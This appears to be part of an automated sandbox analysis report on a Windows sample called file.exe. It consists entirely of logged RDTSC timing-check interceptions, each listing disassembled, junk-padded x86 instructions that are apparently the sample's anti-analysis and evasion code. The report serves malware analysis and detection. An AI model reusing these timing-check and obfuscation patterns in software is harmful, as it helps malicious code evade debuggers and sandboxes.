                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121E1A2 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007FAF1CCF5656h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0131h] 0x00000016 clc 0x00000017 call dword ptr [ebp+122D2758h] 0x0000001d pushad 0x0000001e cld 0x0000001f xor eax, eax 0x00000021 mov dword ptr [ebp+122D2EF4h], edx 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c call 00007FAF1CCF5665h 0x00000031 mov ebx, dword ptr [ebp+122D29A1h] 0x00000037 pop ecx 0x00000038 push ebx 0x00000039 jmp 00007FAF1CCF5668h 0x0000003e pop esi 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2A61h], eax 0x00000046 or dword ptr [ebp+122D3381h], ebx 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2EF4h], edx 0x00000057 jmp 00007FAF1CCF565Fh 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007FAF1CCF5668h 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1882h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007FAF1CCF5665h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2EF4h], ebx 0x00000080 jp 00007FAF1CCF5657h 0x00000086 stc 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jbe 00007FAF1CCF5658h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139C889 second address: 139C8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 jmp 00007FAF1CBF1D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FAF1CBF1D46h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139C8C0 second address: 139C8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139C8C4 second address: 139C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139C8CA second address: 139C8DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAF1CCF565Bh 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CB67 second address: 139CB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CB6B second address: 139CB84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007FAF1CCF565Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CCBC second address: 139CCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CDFA second address: 139CE37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAF1CCF5663h 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 jc 00007FAF1CCF5656h 0x00000017 jmp 00007FAF1CCF565Eh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CFC7 second address: 139CFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0CB5 second address: 13A0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push edx 0x0000000d jnc 00007FAF1CCF5656h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FAF1CCF5668h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 jmp 00007FAF1CCF5664h 0x00000028 pop ecx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0D00 second address: 13A0D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0D05 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FAF1CCF5661h 0x0000000f mov esi, dword ptr [ebp+122D2C35h] 0x00000015 push dword ptr [ebp+122D0131h] 0x0000001b jp 00007FAF1CCF5658h 0x00000021 push ebx 0x00000022 pop esi 0x00000023 call dword ptr [ebp+122D2758h] 0x00000029 pushad 0x0000002a cld 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D2EF4h], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 call 00007FAF1CCF5665h 0x0000003d mov ebx, dword ptr [ebp+122D29A1h] 0x00000043 pop ecx 0x00000044 push ebx 0x00000045 jmp 00007FAF1CCF5668h 0x0000004a pop esi 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D2A61h], eax 0x00000052 or dword ptr [ebp+122D3381h], ebx 0x00000058 mov esi, 0000003Ch 0x0000005d sub dword ptr [ebp+122D2EF4h], edx 0x00000063 jmp 00007FAF1CCF565Fh 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jmp 00007FAF1CCF5668h 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D1882h], edi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jmp 00007FAF1CCF5665h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 mov dword ptr [ebp+122D2EF4h], ebx 0x0000008c jp 00007FAF1CCF5657h 0x00000092 stc 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 jbe 00007FAF1CCF5658h 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0D62 second address: 13A0DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FAF1CBF1D46h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e and edi, dword ptr [ebp+122D2B15h] 0x00000014 mov dword ptr [ebp+122D2893h], ecx 0x0000001a popad 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6CEACAC0h 0x00000024 ja 00007FAF1CBF1D46h 0x0000002a popad 0x0000002b mov dword ptr [ebp+122D27B5h], eax 0x00000031 popad 0x00000032 call 00007FAF1CBF1D49h 0x00000037 jmp 00007FAF1CBF1D53h 0x0000003c push eax 0x0000003d jmp 00007FAF1CBF1D4Ch 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0DC6 second address: 13A0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0DE2 second address: 13A0DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0DE7 second address: 13A0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0DED second address: 13A0DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0DFB second address: 13A0DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0E9F second address: 13A0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0EA3 second address: 13A0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0F2E second address: 13A0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0F32 second address: 13A0FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FAF1CCF5664h 0x00000011 nop 0x00000012 add esi, dword ptr [ebp+122D27ADh] 0x00000018 mov edi, dword ptr [ebp+122D2A35h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FAF1CCF5658h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov edx, dword ptr [ebp+122D2C25h] 0x00000040 call 00007FAF1CCF5659h 0x00000045 jo 00007FAF1CCF5663h 0x0000004b jmp 00007FAF1CCF565Dh 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 jp 00007FAF1CCF5656h 0x00000059 pop eax 0x0000005a pop eax 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0FB6 second address: 13A0FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FAF1CBF1D4Eh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jnc 00007FAF1CBF1D4Eh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A0FE5 second address: 13A108D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF1CCF5669h 0x0000000b popad 0x0000000c pop eax 0x0000000d movsx ecx, cx 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FAF1CCF5658h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jl 00007FAF1CCF5659h 0x00000032 movsx edx, si 0x00000035 push 00000000h 0x00000037 add edx, 10B21B71h 0x0000003d or cx, 10D5h 0x00000042 push 00000003h 0x00000044 call 00007FAF1CCF5659h 0x00000049 pushad 0x0000004a jnp 00007FAF1CCF565Ch 0x00000050 push edi 0x00000051 pushad 0x00000052 popad 0x00000053 pop edi 0x00000054 popad 0x00000055 push eax 0x00000056 push edi 0x00000057 jmp 00007FAF1CCF5664h 0x0000005c pop edi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 pushad 0x00000062 jmp 00007FAF1CCF565Bh 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A108D second address: 13A10C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jbe 00007FAF1CBF1D48h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A119C second address: 13A11A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A11A2 second address: 13A11A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A11A6 second address: 13A120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f call 00007FAF1CCF5665h 0x00000014 adc si, B097h 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b sub dword ptr [ebp+122D183Ch], ecx 0x00000021 push 00000000h 0x00000023 cmc 0x00000024 add ecx, dword ptr [ebp+122D2901h] 0x0000002a call 00007FAF1CCF5659h 0x0000002f pushad 0x00000030 jmp 00007FAF1CCF565Dh 0x00000035 jne 00007FAF1CCF5658h 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 pop edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A120F second address: 13A123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007FAF1CBF1D6Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAF1CBF1D58h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A123B second address: 13A12BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FAF1CCF5669h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jp 00007FAF1CCF5662h 0x0000001b pop eax 0x0000001c jbe 00007FAF1CCF5659h 0x00000022 movsx edi, bx 0x00000025 push 00000003h 0x00000027 mov edx, dword ptr [ebp+122D2A15h] 0x0000002d push 00000000h 0x0000002f and esi, dword ptr [ebp+122D1C50h] 0x00000035 push 00000003h 0x00000037 adc dx, 7A0Ah 0x0000003c call 00007FAF1CCF5659h 0x00000041 push edx 0x00000042 jmp 00007FAF1CCF565Fh 0x00000047 pop edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FAF1CCF565Ah 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A12BE second address: 13A12FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CBF1D4Ch 0x00000008 jo 00007FAF1CBF1D46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jc 00007FAF1CBF1D5Ah 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007FAF1CBF1D50h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jne 00007FAF1CBF1D48h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A12FB second address: 13A12FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A12FF second address: 13A1328 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF1CBF1D58h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DF7E second address: 138DF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DF82 second address: 138DF88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DF88 second address: 138DFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CCF5668h 0x0000000d jmp 00007FAF1CCF565Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DFB3 second address: 138DFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF70E second address: 13BF713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF713 second address: 13BF71A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF71A second address: 13BF72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FAF1CCF5656h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF72B second address: 13BF73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF73B second address: 13BF741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF741 second address: 13BF757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF89D second address: 13BF8A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BF8A1 second address: 13BF8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FAF1CBF1D52h 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAF1CBF1D52h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BFA27 second address: 13BFA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CCF5656h 0x0000000a jmp 00007FAF1CCF5660h 0x0000000f popad 0x00000010 push edi 0x00000011 js 00007FAF1CCF5656h 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BFA4A second address: 13BFA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BFA54 second address: 13BFA6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CCF5656h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FAF1CCF5656h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BFE64 second address: 13BFE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BFE6A second address: 13BFE7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FAF1CCF565Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0106 second address: 13C0110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0110 second address: 13C0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0116 second address: 13C0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0120 second address: 13C0132 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FAF1CCF5656h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0132 second address: 13C013C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CBF1D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C013C second address: 13C014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C014B second address: 13C014F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0295 second address: 13C029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C058A second address: 13C058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0880 second address: 13C088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C088A second address: 13C088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C088E second address: 13C08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5663h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C1310 second address: 13C131B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C131B second address: 13C1320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C71BF second address: 13C71C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C71C8 second address: 13C71CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C71CC second address: 13C71D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C74A2 second address: 13C74A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C74A8 second address: 13C74AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C855E second address: 13C856A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C856A second address: 13C8570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CBC64 second address: 13CBC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CBC68 second address: 13CBC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
